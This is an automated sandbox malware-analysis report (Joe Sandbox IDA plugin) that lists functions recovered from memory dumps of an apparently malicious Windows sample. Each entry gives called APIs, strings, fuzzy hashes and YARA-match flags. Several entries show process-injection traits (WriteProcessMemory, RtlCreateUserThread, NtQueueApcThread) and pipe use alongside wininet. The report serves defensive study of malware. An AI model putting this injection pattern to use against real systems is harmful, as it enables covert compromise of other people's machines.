Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 186726f90331c77a015e9f53925f58eda12074b85e7b181189fa26656f8a1d9b
Instruction ID: 5883286194064003757cc539d9e57b857df900a624c8104b5e1425e8f487ed82
Opcode Fuzzy Hash: 186726f90331c77a015e9f53925f58eda12074b85e7b181189fa26656f8a1d9b
Instruction Fuzzy Hash: 4B2108D2B4C18514DE27B726EC2839E2F60A346FC8F58856FAED642396FD2DC851C748

Uniqueness

Uniqueness Score: -1.00%

Function 00499A00 Relevance: 7.6, APIs: 5, Instructions: 67stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00499A19
strlen.MSVCRT ref: 00499A24
memcpy.MSVCRT ref: 00499A41
setlocale.MSVCRT ref: 00499A4F
setlocale.MSVCRT ref: 00499A87

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: d8b7cc7f442d539e11ce5b3453bf5cdb8ee882d828a5f5d9140233e5098325e2
Instruction ID: 8dc0d7be15a0d8b5aec957bd214a518bb04d9a7c272a47bfa6998aef3151219c
Opcode Fuzzy Hash: d8b7cc7f442d539e11ce5b3453bf5cdb8ee882d828a5f5d9140233e5098325e2
Instruction Fuzzy Hash: 3A110572B05A8454DB16EF37981235E6650AB97BC8F08C33FAE0A1A355DF3C8592C308

Uniqueness

Uniqueness Score: -1.00%

Function 00499C20 Relevance: 7.6, APIs: 5, Instructions: 67stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00499C39
strlen.MSVCRT ref: 00499C44
memcpy.MSVCRT ref: 00499C61
setlocale.MSVCRT ref: 00499C6F
setlocale.MSVCRT ref: 00499CA6

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: bb48b2d25f39208505d6c6549327dcc51533d750845ba2b231ca1eae83ae3505
Instruction ID: 308e222f0e406191a811d34e9a51a5fe7e24df994fbb5af7738c6190900a963d
Opcode Fuzzy Hash: bb48b2d25f39208505d6c6549327dcc51533d750845ba2b231ca1eae83ae3505
Instruction Fuzzy Hash: A611C0B360528855DB15EF37AC5235E66506B4ABC8F0CC32BAE051A355EF3C95D4D308

Uniqueness

Uniqueness Score: -1.00%

Function 00499DC0 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00499DE8
strlen.MSVCRT ref: 00499E33
memcpy.MSVCRT ref: 00499E50
setlocale.MSVCRT ref: 00499E5D
setlocale.MSVCRT ref: 00499E87

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 38aecfb674b2b6edb93b11f9f8c46391442bf999ddafd1af6621f101fc2e5770
Instruction ID: 65bc67dc18f9ee9a2026b2bf862014949b09a12bcc1e7b03fa93d470b2ba7940
Opcode Fuzzy Hash: 38aecfb674b2b6edb93b11f9f8c46391442bf999ddafd1af6621f101fc2e5770
Instruction Fuzzy Hash: 6D11269231118451DA24EB73AD25BBFD646A799FD8F48403EAF0D0BB46DD3CC546830C

Uniqueness

Uniqueness Score: -1.00%

Function 0041F220 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 0041F23E
strlen.MSVCRT ref: 0041F249
memcpy.MSVCRT ref: 0041F266
setlocale.MSVCRT ref: 0041F271
setlocale.MSVCRT ref: 0041F294

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: b00dcecbe0b905f2741d14d995cd5eb519c8a56db7e58c307ae879b8f2cd8a2a
Instruction ID: effffdab01dbea8eb471914c44a9e0d52afa839a9591e7224bc9ab8f17c41f42
Opcode Fuzzy Hash: b00dcecbe0b905f2741d14d995cd5eb519c8a56db7e58c307ae879b8f2cd8a2a
Instruction Fuzzy Hash: ECF0F42271114410DE29FAA36D268EFA2412B5AFDCB0C803FBE1E8B701ED3CC0828308

Uniqueness

Uniqueness Score: -1.00%

Function 036878F3 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03687904

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

__doserrno.LIBCMT ref: 036878FC

Part of subcall function 0367EFA3: _getptd_noexit.LIBCMT ref: 0367EFA7

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction ID: 2f0cb430945f9af7718347fdbb28596b323155f426ff2adde29469c2101c97c9
Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction Fuzzy Hash: 62F0FC34525A094EDB29FB78C8907583690FF4633AFA4438CD015CF2E5D77D44438751

Uniqueness

Uniqueness Score: -1.00%

Function 00418640 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041866B
_errno.MSVCRT ref: 00418670
memset.MSVCRT ref: 0041868E
_errno.MSVCRT ref: 00418693
memcpy.MSVCRT ref: 004186B3

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: _errnomemset$memcpy
String ID:
API String ID: 1126794065-0
Opcode ID: 66cdd81826b67d101f12161d4e7057012a7fce54e2a52a044d5b1e985310b689
Instruction ID: d4483e4a52670accedd0819bd5470e4896168148500ce221aafe4ca68e28b616
Opcode Fuzzy Hash: 66cdd81826b67d101f12161d4e7057012a7fce54e2a52a044d5b1e985310b689
Instruction Fuzzy Hash: F6F082B1B0230893EB196BE649813E625424F98BC0F4C503E5F1847742DE2D4DD55659

Uniqueness

Uniqueness Score: -1.00%

Function 03A884AC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A884BD

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

__doserrno.LIBCMT ref: 03A884B5

Part of subcall function 03A7FB5C: _getptd_noexit.LIBCMT ref: 03A7FB60

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction ID: b201dbe291162eefa10b7388b985aa06ab33764257cadbb4dc915186af10d055
Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction Fuzzy Hash: 84F0CDB7611B848ADA09FF28C99032C766A9BA0B32F85571BC62A0B3D0CF7C40048222

Uniqueness

Uniqueness Score: -1.00%

Function 03A6D584 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

Strings

%s!%s, xrefs: 03A6D733

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID:
String ID: %s!%s
API String ID: 0-2935588013
Opcode ID: 87c3d06f94ebd67ad8421af21f0b978c410073bf873a78430363920c94c161ce
Instruction ID: eb727b86a5a00655ea62ab35ceab9df8941a4590b2010f90048d810a346e95fc
Opcode Fuzzy Hash: 87c3d06f94ebd67ad8421af21f0b978c410073bf873a78430363920c94c161ce
Instruction Fuzzy Hash: 3D51AB7A30468086CB24EF62D540A697361F389FD8F48852BDF8E4B748EF38C942C746

Uniqueness

Uniqueness Score: -1.00%

Function 03A71A2C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85sleeppipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 03A71AB1
GetStartupInfoA.KERNEL32 ref: 03A71ABB
Sleep.KERNEL32 ref: 03A71AFA

Part of subcall function 03A731F8: GetTickCount.KERNEL32 ref: 03A73211
Part of subcall function 03A731F8: GetTickCount.KERNEL32 ref: 03A73252

Strings

C:\Windows\system32\wininet.dll, xrefs: 03A71A87

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountTick$CreateInfoPipeSleepStartup
String ID: C:\Windows\system32\wininet.dll
API String ID: 1809008225-2281562036
Opcode ID: 5e6f3385fbd9ba9b3e2821c2904d32e5f24c890e0dca28dd113a52ced404c9b5
Instruction ID: f4461d417874cc5b0a07fed8ebe41a0fdd9ba1a4c2566c074432269ba323bd54
Opcode Fuzzy Hash: 5e6f3385fbd9ba9b3e2821c2904d32e5f24c890e0dca28dd113a52ced404c9b5
Instruction Fuzzy Hash: 12416A76604B84CAD700DF65E88068EB7B5F789798F10451AEF8C67B28DF39D946CB80

Uniqueness

Uniqueness Score: -1.00%

Function 03A7C178 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 03A7C20D
LookupAccountSidA.ADVAPI32 ref: 03A7C252
_snprintf.LIBCMT ref: 03A7C27A

Strings

%s\%s, xrefs: 03A7C268

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AccountInformationLookupToken_snprintf
String ID: %s\%s
API String ID: 2107350476-4073750446
Opcode ID: eab80e5e76cae2f62ff1f8dbdd5d2f372e8e47681e9448c49ff6034cb1a03876
Instruction ID: 43f041ca0490c25d1b78dd2d7dd79ff015da4618b920dc0a2d746a62982ae970
Opcode Fuzzy Hash: eab80e5e76cae2f62ff1f8dbdd5d2f372e8e47681e9448c49ff6034cb1a03876
Instruction Fuzzy Hash: B1214D76204FC196D724DF61E8447DAB3A8F788B98F448126EA8D67B18DF38C305CB40

Uniqueness

Uniqueness Score: -1.00%

Function 03A722A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64injectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A722E6

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

WriteProcessMemory.KERNEL32 ref: 03A72354
free.LIBCMT ref: 03A7236A

Strings

@, xrefs: 03A72329

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeapMemoryProcessWrite_callnewhfreemalloc
String ID: @
API String ID: 2776329143-2766056989
Opcode ID: f16ef9615b18e5dd8738061e84ba1a26569ff2d2e873f0e2120eda13e1fc476a
Instruction ID: d155f6de1728125e975a6bab8331b8bbde5d5f5942ede3a465e52c10652e4949
Opcode Fuzzy Hash: f16ef9615b18e5dd8738061e84ba1a26569ff2d2e873f0e2120eda13e1fc476a
Instruction Fuzzy Hash: 47214736704B4086DA21DF17F89065ABBA8FBC8F90F8945269F9D97B24DF38C142C740

Uniqueness

Uniqueness Score: -1.00%

Function 03A6F97C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63synchronizationpipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 03A6F9E6
GetStartupInfoA.KERNEL32 ref: 03A6F9F0
WaitForSingleObject.KERNEL32 ref: 03A6FA3C

Strings

C:\Windows\system32\wininet.dll, xrefs: 03A6F9C2

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CreateInfoObjectPipeSingleStartupWait
String ID: C:\Windows\system32\wininet.dll
API String ID: 654700190-2281562036
Opcode ID: d13e0f5983de71ea7e727a08521ea8f341b819e88e50acb37e0632d521275e51
Instruction ID: 98b6569d4926ecb9d7ed8d5ded2b8c02f5970eeb87a02f40639260e35860d211
Opcode Fuzzy Hash: d13e0f5983de71ea7e727a08521ea8f341b819e88e50acb37e0632d521275e51
Instruction Fuzzy Hash: D531EC36B01B408AE710CFB5E8403DC33BAF758B88F55452AAE8C67B58DA74C65AC780

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDC3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 0040BE1C
fprintf.MSVCRT ref: 0040BE45

Strings

Unknown error, xrefs: 0040BEB0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040BE3E

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_funcfprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 620453056-3474627141
Opcode ID: 5b9a9704cabf9f346ed4b87b6149251a9cef546431c4c5322a1a0a8759edf334
Instruction ID: 4caca5cb4ceffe427c0fdfca0c7cd8a3a786139faf558d5bf8c4042ecfea3e44
Opcode Fuzzy Hash: 5b9a9704cabf9f346ed4b87b6149251a9cef546431c4c5322a1a0a8759edf334
Instruction Fuzzy Hash: EC118663514E88C6D716CF1CD8013DA7775FF9A75AF589306EB8826260DB35C943C744

Uniqueness

Uniqueness Score: -1.00%

Function 03A72B60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03A72B8A
GetProcAddress.KERNEL32 ref: 03A72B9A

Strings

RtlCreateUserThread, xrefs: 03A72B90
ntdll.dll, xrefs: 03A72B77

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlCreateUserThread$ntdll.dll
API String ID: 1646373207-2935400652
Opcode ID: 15f0dc51ca9a3cf6381f817f0897e39ef6e2971f7222ba54e661cb1281496193
Instruction ID: 1e3a585c888d0c0e78f99471c1fc049a03f73d7bdcb91f985fd9a24e059c400c
Opcode Fuzzy Hash: 15f0dc51ca9a3cf6381f817f0897e39ef6e2971f7222ba54e661cb1281496193
Instruction Fuzzy Hash: 17010932314B8482DB60CF51F88474AB7A8F799BD0F99817AAADD43B14DF38C595C740

Uniqueness

Uniqueness Score: -1.00%

Function 0040D640 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0040D6C1
RtlUnwindEx.KERNEL32 ref: 0040D6DF
abort.MSVCRT ref: 0040D6E5

Strings

CCG , xrefs: 0040D68F

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID: CCG
API String ID: 747564614-1584390748
Opcode ID: 3289f6442659b2a772218643362c3cfceae8cfb581dc509fe66c51078f2fa57e
Instruction ID: 38b3d55675230658ef05d0cf58b8ed71664b6cb8721dc16fbc14c0e1cfac74e3
Opcode Fuzzy Hash: 3289f6442659b2a772218643362c3cfceae8cfb581dc509fe66c51078f2fa57e
Instruction Fuzzy Hash: 4B110572208B8896D7608F52F84439ABBB5F388BD8F544226EF8D03B58CF79C155CB40

Uniqueness

Uniqueness Score: -1.00%

Function 03A72538 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03A7255C
GetProcAddress.KERNEL32 ref: 03A7256C

Strings

ntdll, xrefs: 03A7254F
NtQueueApcThread, xrefs: 03A72562

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: NtQueueApcThread$ntdll
API String ID: 1646373207-1374908105
Opcode ID: d30a437afc947ebabf09e6ac1e31674b1d188f910b9a95b468b4020ddae0429a
Instruction ID: 44ad2f8761b614e1cfdde019d692abd5b9c82d69d7dba630a4001be4afd2682f
Opcode Fuzzy Hash: d30a437afc947ebabf09e6ac1e31674b1d188f910b9a95b468b4020ddae0429a
Instruction Fuzzy Hash: 3F018625714B41C6DB00DB56F99035AB3A4FB89BD0F984927DF9957B24DF38C151C700

Uniqueness

Uniqueness Score: -1.00%

Function 004185B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 004185F1
GetProcAddress.KERNEL32 ref: 00418601

Strings

msvcrt.dll, xrefs: 004185E5
memcpy_s, xrefs: 004185F7

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: memcpy_s$msvcrt.dll
API String ID: 1646373207-148085341
Opcode ID: 046300dd92055301538874d1da12fbce66ab13185a76e876c5d7b1d2aab105df
Instruction ID: ba81ff8405e623fa6cfe5e7de3662e12bd52288885ed5fce00e1f82497a688b6
Opcode Fuzzy Hash: 046300dd92055301538874d1da12fbce66ab13185a76e876c5d7b1d2aab105df
Instruction Fuzzy Hash: BEF087B1380B05A0EE219B05FC403896762B749BE8F88812ACE4D07738EA7CC196C308

Uniqueness

Uniqueness Score: -1.00%

Function 00401540 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

